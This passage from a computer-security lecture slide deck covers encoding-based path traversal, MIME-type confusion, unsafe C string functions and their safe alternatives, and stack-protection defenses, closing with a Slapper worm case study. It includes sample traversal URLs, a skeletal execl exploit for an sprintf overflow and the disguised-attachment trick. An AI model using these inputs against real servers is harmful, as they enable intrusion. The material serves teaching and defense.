- It is easy enough for the server to spot `%2F` and recognize a forward slash, but `%2F` can be encoded via the 8-11 bits format as `%C0%AF`:
- http://domain.tld/user/..%C0%AFpasswords.txt
- No longer looks like ../ is present, but it is!
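## URL Character Encoding: Rejecting Overlong Forms (Sketch)
`%C0%AF` works because a lenient decoder extracts the payload bits without asking whether two bytes were needed. The two functions are hypothetical illustrations of the lenient and strict behaviors for the two-byte form only.

```c
/* Decode a two-byte UTF-8 sequence the lenient way: just extract the
 * 11 payload bits. Returns the code point, or -1 if the byte patterns
 * are not 110xxxxx 10xxxxxx. */
long decode2_lenient(unsigned char b0, unsigned char b1) {
    if ((b0 & 0xE0) != 0xC0 || (b1 & 0xC0) != 0x80)
        return -1;
    return ((long)(b0 & 0x1F) << 6) | (b1 & 0x3F);
}

/* Strict variant: also reject overlong forms, i.e. values below 0x80
 * that should have been written as a single byte. */
long decode2_strict(unsigned char b0, unsigned char b1) {
    long cp = decode2_lenient(b0, b1);
    return cp < 0x80 ? -1 : cp;
}
```

The lenient decoder turns 0xC0 0xAF into 0x2F, a forward slash, while the strict one refuses it and still accepts genuine two-byte characters such as 0xC3 0xA9.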
## URL Character Encoding cont.
- Simple encoding problem was easily fixed in web servers, but multilevel encoding is possible:
- `%255c` is not recognized as a backslash by the security checker
- After one round of decoding, `%255c` becomes `%5c`, because `%25` is the code for the percent sign itself: `%25` → `%`
- The result, `%5c`, would have been flagged as a backslash by the security checker if it had been present initially; the checker was only searching for `%5c` or `\`
## URL Character Encoding cont.
- The server invokes one more round of decoding because it still sees a `%` sign, and `%5c` becomes a backslash (useful in Windows path names)
- Because the encoded exploit has already passed the security checker, the web server serves the page (unfortunately!)
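## URL Character Encoding: Double Decoding (Sketch)
The two decoding rounds can be reproduced with a small percent-decoder. This is a simplified sketch, not any server's actual code: the function names are hypothetical, and the sample strings in the usage note are made up.

```c
#include <string.h>

static int hex_value(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes once, in place. Malformed escapes are left as-is. */
void percent_decode_once(char *s) {
    char *out = s;
    while (*s != '\0') {
        int hi = (s[0] == '%') ? hex_value((unsigned char)s[1]) : -1;
        int lo = (hi >= 0) ? hex_value((unsigned char)s[2]) : -1;
        if (lo >= 0) {
            *out++ = (char)(hi * 16 + lo);
            s += 3;
        } else {
            *out++ = *s++;
        }
    }
    *out = '\0';
}

/* Keep decoding until a pass changes nothing. Each decoded escape
 * shortens the string, so an unchanged length means no escapes remain. */
void percent_decode_fully(char *s) {
    size_t before;
    do {
        before = strlen(s);
        percent_decode_once(s);
    } while (strlen(s) != before);
}
```

One pass over `..%255cwinnt` yields `..%5cwinnt`, and a second pass yields `..\winnt`. A checker is only meaningful if it inspects the string after the last decoding step the server will perform.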
## URL Character Encoding cont.
- Web servers such as Microsoft IIS have been patched to fix this vulnerability
- Before the patch, the [W32/Nimda](https://www.symantec.com/security_response/writeup.jsp?docid=2001-091816-3508-99) worm used this trick to backtrack into the root directory and use cmd.exe to copy itself over the web to the server and execute itself.
## MIME Header Parsing
- An email can have embedded or attached MIME files
- Outlook and other email clients often use Internet Explorer to parse the MIME files
- A MIME file type can be associated with an application and passed automatically to it, e.g. audio/x-wav files can be associated in Windows with Windows Media Player, so such a file would be sent by Internet Explorer directly to its associated application
## MIME Header Parsing
- Vulnerability: Internet Explorer (before being fixed; see [here](http://www.microsoft.com/technet/security/bulletin/MS01-020.mspx)) would determine that the attachment should be opened automatically by an application, but would then allow the file extension to take priority in determining what application to use
## MIME Header Parsing
- Exploit: Make an attachment of MIME type audio/x-wav but make the file name be virus.exe.
- The MIME type causes Internet Explorer to make the decision to open it automatically (even though the Outlook email client might have settings that should prevent opening *.exe files).
- Then, the *.exe extension causes Internet Explorer to pass it to the OS to execute.
- Vulnerability fixed in 2001 (IE 5.x).
- Not before [W32/Badtrans](https://www.symantec.com/security_response/writeup.jsp?docid=2001-112410-5327-99) and [W32/Klez](https://www.symantec.com/security_response/writeup.jsp?docid=2002-041714-3225-99) could exploit it.
</textarea></section>
</section>
<section>
<section data-markdown id="miscvul"><textarea data-template>
# Miscellaneous Vulnerabilities
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Miscellaneous Vulnerabilities
- Mistakes by system administrators, users, bad default security levels in applications software or firewalls, etc., can all create vulnerabilities
- Most exploits (including all 3 generations) are referred to as *blended attacks*
- Because there is always a mixture of an exploit and a particular type of malicious code
- e.g. overflowing a buffer is an exploit, but depositing a virus and running it is the second stage of the blended attack
- We will review some non source code examples
## System Administration Vulnerabilities
- Failure to provide secure utilities
- e.g. SSL/SSH remote login utilities were not commonly used a decade ago
- Loose file system access rights and user privilege levels
- many users have no idea that everyone can read many of their files
- or what the 4th (leading) octal digit of chmod permissions controls (the setuid, setgid, and sticky bits)
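- A minimal sketch of auditing those permission bits on a numeric mode such as `0644` or `04755`; the helper names `world_readable()` and `has_special_bits()` are made up for this slide:

```c
/* Nonzero if "other" (everyone) may read the file: the 0004 bit. */
int world_readable(unsigned int mode) {
    return (mode & 0004u) != 0;
}

/* Nonzero if any bit of the leading (4th) octal digit is set:
   setuid (04000), setgid (02000), or sticky (01000). */
int has_special_bits(unsigned int mode) {
    return (mode & 07000u) != 0;
}
```

- For example, `world_readable(0644)` is true and `has_special_bits(04755)` is true, while mode `0600` passes neither check.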
## System Administration Vulnerabilities
- Errors in firewall configuration (Szor, sec. 14.3)
- Allows attackers unauthorized access
- Permits denial of service attacks to continue instead of excluding the flood of packets
## User Behavior Vulnerabilities
- Poor password selection
- Too short; all alphabetic; common words
- 1988 Morris worm used a list of only 432 common passwords, and succeeded in cracking many user accounts all over the internet
- This was the main reason the worm spread more than the creator thought it would; he did not realize that password selection was that bad!
- Opening executable email attachments
## Vulnerabilities: Do We Ever Learn?
- All of these vulnerabilities have been known for years -- buffer overflows for over 40 years!
- Yet, the number of exploits is increasing
- 323 buffer overflow vulnerabilities reported in 2004 to the national cyber-security vulnerability database (http://nvd.nist.gov/)
- 331 buffer overflow vulnerabilities reported in just the first 6 months of 2005!
- They don't bother to keep track anymore...
## Avoiding Vulnerabilities
- Good password selection
- Many newer systems even allow pass phrases, i.e. multiple words with punctuation or blanks between
- System should try its own dictionary attack and not permit you to choose a password that can be defeated
- Don't store a password unencrypted anywhere in a system, even in a temporary variable in a program
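- A minimal sketch of a system rejecting weak choices up front; the function name `is_weak_password()`, the 8-character minimum, and the tiny word list are assumptions for illustration only:

```c
#include <ctype.h>
#include <string.h>

/* Tiny stand-in dictionary; a real system would use a large word list. */
static const char *const COMMON_WORDS[] = {
    "password1", "letmein123", "qwerty123"
};

/* Returns 1 if the candidate is too short, all alphabetic,
   or found in the word list; returns 0 otherwise. */
int is_weak_password(const char *pw) {
    size_t len = strlen(pw);
    size_t i;
    int all_alpha = 1;

    if (len < 8) {
        return 1;                       /* too short */
    }
    for (i = 0; i < len; i++) {
        if (!isalpha((unsigned char)pw[i])) {
            all_alpha = 0;
            break;
        }
    }
    if (all_alpha) {
        return 1;                       /* all alphabetic */
    }
    for (i = 0; i < sizeof COMMON_WORDS / sizeof COMMON_WORDS[0]; i++) {
        if (strcmp(pw, COMMON_WORDS[i]) == 0) {
            return 1;                   /* dictionary hit */
        }
    }
    return 0;
}
```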
## Avoiding Vulnerabilities
- Don't open executable email attachments
- Review access permissions throughout your file directory structure
- Display and review your firewall settings
</textarea></section>
</section>
<section>
<section data-markdown id="safeandunsafe"><textarea data-template>
# Safe and Unsafe Coding
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Avoiding Vulnerabilities
- Good coding style
- Always pass a literal format string, e.g. `printf("%s", buffer)`; never use `printf(buffer)` with any function in the `printf()` family
- Review loop bounds for off-by-one errors
- Avoid unsafe C functions (e.g. `strcpy()`, `strcat()`, `sprintf()`, `gets()`, `scanf()`) and learn how to use alternatives (e.g. `strncpy()`, `strncat()`, `snprintf()`)
- Insert bounds checking code
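- A minimal sketch of the good form, treating untrusted text as data rather than as the format string; the helper name `format_user_text()` is hypothetical:

```c
#include <stdio.h>

/* Format untrusted text as data, never as the format string.
   Returns the number of characters stored, excluding the terminator. */
int format_user_text(char *out, size_t outsize, const char *user_text) {
    int n;

    if (outsize == 0) {
        return 0;
    }
    /* Unsafe alternative: snprintf(out, outsize, user_text); */
    n = snprintf(out, outsize, "%s", user_text);
    if (n < 0) {
        out[0] = '\0';
        return 0;
    }
    /* snprintf() reports the untruncated length; clamp to what fit. */
    return (size_t)n < outsize ? n : (int)(outsize - 1);
}
```

- Conversion specifiers inside `user_text`, such as `%x` or `%n`, are copied literally instead of being interpreted.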
## Avoiding Vulnerabilities
- Good coding style, continued
- Avoid unsafe programming languages (C, C++) and use more modern, safe languages wherever possible (Java, Ada, C# in managed mode)
- We will look at some coding style pointers from [Building Secure Software](https://www.amazon.com/Building-Secure-Software-Addison-Wesley-Professional/dp/0321774957) by Viega and McGraw
## Safe and Unsafe Coding
- Unsafe:
```
int main(void) {
  char buf[1024];
  gets(buf); /* Won't stop at 1024 bytes; removed from the standard library in C11 */
  return 0;
}
```
- Safe:
```
#include <stdio.h>
#define BUFSIZE 1024
int main(void) {
  char buf[BUFSIZE];
  fgets(buf, BUFSIZE, stdin); /* Reads at most BUFSIZE - 1 characters */
  return 0;
}
```
## Safe and Unsafe Coding
- Unsafe:
```
strcpy(dst, src); /* What prevents buffer overflow? */
```
- Safe:
```
#define DSTSIZE 1024
char dst[DSTSIZE];
:
:
/* Leave room for null terminator: */
strncpy(dst, src, DSTSIZE - 1);
/* Null terminate the string: */
dst[DSTSIZE - 1] = '\0';
```
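- The same pattern can be wrapped so that callers also learn about truncation. This is a sketch only; the helper name `copy_checked()` and its return convention are assumptions, not a standard API:

```c
#include <string.h>

/* Copy src into dst (capacity dstsize), always null terminating.
   Returns 1 if src was truncated, 0 if it fit, -1 on bad arguments. */
int copy_checked(char *dst, size_t dstsize, const char *src) {
    size_t srclen;

    if (dst == NULL || src == NULL || dstsize == 0) {
        return -1;
    }
    srclen = strlen(src);
    strncpy(dst, src, dstsize - 1);   /* leave room for the terminator */
    dst[dstsize - 1] = '\0';          /* strncpy() may not terminate */
    return srclen >= dstsize;
}
```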
## Safe and Unsafe Coding
- Unsafe:
```
strcpy(dst, src); /* What prevents buffer overflow? */
```
- Safe:
```
/* Another way to fix the problem: */
dst = (char *) malloc(strlen(src) + 1);
if (NULL == dst) {
/* handle error here, abort */
}
strcpy(dst, src);
```
## Safe and Unsafe Coding
- Unsafe:
```
strcat(dst, src);
/* Enough room left in dst to concatenate src? */
```
- Safe:
```
strncat(dst, src, DSTSIZE - strlen(dst) - 1);
```
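- The expression `DSTSIZE - strlen(dst) - 1` is only meaningful if `dst` already holds a terminated string shorter than `DSTSIZE`. A sketch that checks this first; the helper name `append_checked()` is hypothetical:

```c
#include <string.h>

/* Append src to the string in dst (capacity dstsize).
   Returns 0 on success, 1 if src was truncated, and -1 if dst does
   not hold a terminated string within dstsize bytes. */
int append_checked(char *dst, size_t dstsize, const char *src) {
    const char *end = memchr(dst, '\0', dstsize);
    size_t used, room;

    if (end == NULL) {
        return -1;                    /* no terminator: refuse to append */
    }
    used = (size_t)(end - dst);
    room = dstsize - used - 1;        /* cannot underflow: used < dstsize */
    strncat(dst, src, room);          /* appends at most room chars + '\0' */
    return strlen(src) > room;
}
```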
## Safe and Unsafe Coding
- Unsafe:
```
int main(int argc, char *argv[]) {
char usage[1024];
/* Big enough for a valid file name ... right? */
sprintf(usage, "USAGE: %s -f flag [arg1]\n", argv[0]);
return 0;
}
```
- Safe:
```
int main(int argc, char *argv[]) {
char usage[1024];
const char *format_string = "USAGE: %s -f flag [arg1]\n";
snprintf(usage, sizeof usage, format_string, argv[0]);
return 0;
}
```
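- `snprintf()` also reports how long the full output would have been, so truncation can be detected. A minimal sketch, with the helper name `build_usage()` made up for this slide:

```c
#include <stdio.h>

/* Build the usage line in out (capacity outsize).
   Returns 1 if the line was truncated, 0 if it fit,
   and -1 on an output error. */
int build_usage(char *out, size_t outsize, const char *progname) {
    int n = snprintf(out, outsize, "USAGE: %s -f flag [arg1]\n", progname);

    if (n < 0) {
        return -1;
    }
    /* n is the length the full string needs, excluding the '\0'. */
    return (size_t)n >= outsize;
}
```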
## Safe and Unsafe Coding: sprintf()
- Vulnerability:
```
int main(int argc, char *argv[]) {
char usage[1024]; /* Can this be overflowed? */
sprintf(usage, "USAGE: %s -f flag [arg1]\n", argv[0]);
// How long can a filename be, in argv[0]? What if the
// filename is not a legitimate name from the OS? See
// exploit below.
return 0;
}
```
## Safe and Unsafe Coding: sprintf()
- Exploit:
```
int main(int argc, char *argv[]) {
execl("/path/to/above/program",
[very long string here],
NULL);
// Starts program in 1st arg, passes 2nd arg
// as argv[0] to that program. Bad news!
return 0;
}
```
## Safe and Unsafe Coding: sprintf()
- Problem: `snprintf()` was only standardized in C99, so it is not part of all (older) C libraries
- Solutions:
- Package a working `snprintf()` with your software
- Use a precision specifier in `sprintf()` to cap the number of characters copied from the argument:
```
sprintf(usage, "USAGE: %.1000s -f flag [arg1]\n",
argv[0]);
```
- Unfortunately, the precision specifier `%.1000s` is not standard across all libraries, either
## Safe and Unsafe Coding
- Unsafe:
```
int main(int argc, char *argv[]) {
  char buf[256];
  sscanf(argv[0], "%s", buf); // Won't stop at 256 bytes
  return 0;
}
```
- Safe:
```
int main(int argc, char *argv[]) {
  char buf[256];
  sscanf(argv[0], "%255s", buf); // Width limit leaves room for '\0'
  return 0;
}
```
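- The width must always be one less than the buffer size. A small sketch with an 8-byte buffer so the effect is easy to see; `WORDSIZE` and `first_word()` are hypothetical names:

```c
#include <stdio.h>

#define WORDSIZE 8

/* Read one whitespace-delimited word of at most WORDSIZE - 1 characters.
   Returns 1 if a word was stored, 0 otherwise. */
int first_word(const char *input, char word[WORDSIZE]) {
    /* The width in "%7s" must be WORDSIZE - 1 to leave room for '\0'. */
    return sscanf(input, "%7s", word) == 1;
}
```

- Given the input `"abcdefghijkl"`, only `"abcdefg"` is stored and the rest is left unread.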
## Safe and Unsafe Coding
- Each of the examples applies to a family of library functions
- For example, `scanf()`, `sscanf()`, `fscanf()`, and `vfscanf()` all have the same coding vulnerabilities
- The safe style shown in our examples can be easily adapted to other members of the same family
</textarea></section>
</section>
<section>
<section data-markdown id="defenses"><textarea data-template>
# Defenses
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Compiler-Based Prevention
- One approach: Modify the C language itself with a new compiler and runtime library, as in the [Cyclone variant of C](http://www.research.att.com/projects/cyclone/)
- Overhead for bounds checking, garbage collection, library safeguards, etc., ranges from negligible to >100% for the worst cases
- Another approach: leave the language alone, but modify the compiler to emit stack and/or buffer overflow safeguards in the executable
- Examples we will see: StackGuard, ProPolice, and StackShield
## StackGuard: Stack Canaries
- StackGuard inserts a marker in between the frame pointer and the return address on the stack
- Marker is called a `canary`, as in the "canary in a coal mine"
- If a buffer overflow overwrites the stack all the way to the return address, it will also overwrite the canary
- Before returning, the canary is examined for modification
## Stack Canary Operation
<!-- .slide: class="max-image-height-300" -->
![canary stack](images/exploits/canary-stack.png)
- Overflowing `buffer[]` tramples on canary
- Does not prevent trashing the EBP, local function or file pointers, etc.
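- Canary value: NUL-CR-LF-EOF; very difficult to write out from a string, because string-handling functions such as `strcpy()` and `gets()` stop copying at one or another of these terminator characters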
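- The check can be simulated in plain C. This is a toy model, not StackGuard's generated code: the `sim_frame` layout, the 4-byte canary, and all function names are assumptions for illustration:

```c
#include <string.h>

#define BUFLEN 16

/* Simulated frame, low address first: buffer, canary, return address. */
struct sim_frame {
    char buffer[BUFLEN];
    unsigned char canary[4];
    unsigned char ret_addr[8];
};

/* Terminator canary: NUL, CR, LF, EOF (0xFF). */
static const unsigned char CANARY[4] = { 0x00, 0x0D, 0x0A, 0xFF };

/* Prologue: clear the frame and plant the canary. */
void frame_enter(struct sim_frame *f) {
    memset(f, 0, sizeof *f);
    memcpy(f->canary, CANARY, sizeof CANARY);
}

/* Deliberately unchecked copy, standing in for strcpy() into buffer[]. */
void frame_unchecked_copy(struct sim_frame *f, const char *src, size_t n) {
    if (n > sizeof *f) {
        n = sizeof *f;                /* stay inside the simulation */
    }
    memcpy((unsigned char *)f, src, n);
}

/* Epilogue check: 1 if the canary is intact, 0 if it was trampled. */
int frame_canary_ok(const struct sim_frame *f) {
    return memcmp(f->canary, CANARY, sizeof CANARY) == 0;
}
```

- Copying more than `BUFLEN` bytes reaches the canary before the simulated return address, so `frame_canary_ok()` fails before the "return" would be taken.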
## ProPolice: Better Stack Canaries and Frame Layout
- ProPolice (a.k.a. SSP, Stack-Smashing Protector) from IBM makes a couple of major improvements to StackGuard
- Canary is placed below the saved EBP to protect it
- The stack frame layout is rearranged so that non-array locals, such as function pointers and file pointers, are placed below arrays, so that overflowing the arrays cannot reach the pointers
## Stack Canary Limitations
- Stack canaries only guard against a *direct* attack on the stack, e.g. overwriting a portion of the stack directly from its neighboring addresses
- We saw that a format-string attack is *indirect*: it computes the location of the return address, then overwrites just that address and does not overflow from neighboring addresses
- Hence, it does not overwrite a canary
## StackShield: Protecting Return Addresses
- StackShield is a Linux/gcc add-on that modifies the ASM output from gcc to maintain a separate data segment with return addresses
- Removing the return addresses from the data stack prevents both direct and indirect data attacks on the return address
## StackShield: Protecting Return Addresses
- Also computes the range of valid code addresses and performs a range check on all function calls and returns
- A call to, or return into, a data area will be detected as invalid because of the address range
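- The two ideas (a separate store of return addresses plus a code-range check) can be modeled in a few lines. This is a simulation under assumed names (`shadow_push()`, `shadow_check_return()`), not StackShield's actual assembly rewriting:

```c
#include <stddef.h>
#include <stdint.h>

#define SHADOW_DEPTH 64

static uintptr_t shadow[SHADOW_DEPTH];  /* separate return-address store */
static size_t shadow_top = 0;

/* On call: save a copy of the return address away from the data stack.
   Returns 0 on success, -1 if the shadow stack is full. */
int shadow_push(uintptr_t ret_addr) {
    if (shadow_top == SHADOW_DEPTH) {
        return -1;
    }
    shadow[shadow_top++] = ret_addr;
    return 0;
}

/* On return: 1 if the on-stack address matches the saved copy and lies
   inside the code range [code_lo, code_hi); 0 otherwise. */
int shadow_check_return(uintptr_t on_stack,
                        uintptr_t code_lo, uintptr_t code_hi) {
    uintptr_t saved;

    if (shadow_top == 0) {
        return 0;                     /* return without a matching call */
    }
    saved = shadow[--shadow_top];
    return on_stack == saved && on_stack >= code_lo && on_stack < code_hi;
}
```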
## Operating System Defenses
- Don't allow execution in the stack
- Exploit could still execute code from the heap or other global data area
- Instead of read and write permission bits on pages, add an execute permission bit and set it to false on all data pages (heap, stack, etc.)
- This is supported in hardware (the NX, or no-execute, bit) on the Intel x86-64 architecture and in the versions of Microsoft Windows (from XP onward) that run on it
## Case Study: Slapper Worm
- The 2002 worm known as [Linux/Slapper](https://www.symantec.com/security_response/writeup.jsp?docid=2002-091311-5851-99) was a very complex attack on a heap buffer overflow vulnerability in the SSL support of the Apache web server (the OpenSSL library, used through mod_ssl)
- Vulnerability: In secure mode (i.e. on an https:// connection under SSL [Secure Socket Layer]), Apache copied the client's master key into a fixed-length buffer `key_arg[]` that was just big enough to hold a valid 8-byte key
- But didn't do any bounds checking, even though the key length is passed as a second parameter with the key
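- The missing check is a single comparison. A sketch with hypothetical names (`KEY_ARG_MAX`, `copy_key_arg()`); it is not the actual server code:

```c
#include <string.h>

#define KEY_ARG_MAX 8   /* size of the fixed buffer described above */

/* Copy a client-supplied key only if its claimed length fits.
   Returns 0 on success, -1 if the length is rejected. */
int copy_key_arg(unsigned char dst[KEY_ARG_MAX],
                 const unsigned char *src, size_t claimed_len) {
    if (claimed_len > KEY_ARG_MAX) {
        return -1;                    /* the missing bounds check */
    }
    memcpy(dst, src, claimed_len);
    return 0;
}
```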
## Case Study: Slapper Worm
- Exploit: Pass in a long key and key length, such that a certain magic address is overwritten
## Slapper: The Magic Address
- The magic address that Slapper wanted to overwrite was the GOT (Global Offset Table) entry for the `free()` function
- GOT is the Unix/ELF equivalent of the IAT (Import Address Table) in a Windows PE file; Slapper is therefore an IAT-modifying EPO worm
- I.e., if you redirect the GOT entry for `free()`, then calls that should have gone to `free()` in the C run-time library are redirected to a new address
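- The effect of redirecting a table entry can be shown with an ordinary array of function pointers. This is a harmless model only: `got_sim`, `real_free_stub()`, and `attacker_code()` are made-up stand-ins, and no real GOT is touched:

```c
typedef int (*handler_fn)(void);

static int real_free_stub(void) { return 1; }   /* stands in for free() */
static int attacker_code(void)  { return 2; }   /* stands in for shellcode */

/* One-entry table of function pointers, playing the role of the GOT. */
static handler_fn got_sim[1] = { real_free_stub };

/* Callers never name the function directly; they go through the table. */
int call_free_via_table(void) {
    return got_sim[0]();
}

/* Models the overwrite: afterwards the same call site runs other code. */
void overwrite_table_entry(void) {
    got_sim[0] = attacker_code;
}
```

- The call site in `call_free_via_table()` never changes; only the table entry does, which is why the redirection is hard to spot in the calling code.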
## Slapper: The Magic Address
- The relative distance from the `key_arg[]` buffer to the GOT entry for `free()` differs among Apache revisions and among different Linux revisions for which Apache was compiled
- The Slapper author computed the addresses and distances across 23 (!) different combinations of Apache revision/Linux system
## Slapper: The Magic Address
- The first client message the worm sends is a request for Apache to identify its revision number and the Linux system version code (a legitimate request, as Apache services can depend on these numbers)
- The exploit code was then tuned for the particular revision/system
- Ultimately, Slapper ran its own shellcode on the server system, with Apache privileges, when Apache executed a call to `free()`
- See Szor, 10.4.4, for lots more details
</textarea></section>
</section>
</div>
</div>
<script src="reveal.js/lib/js/head.min.js"></script>
<script src="reveal.js/js/reveal.js"></script>
<script src="settings.js"></script>
</body>
</html>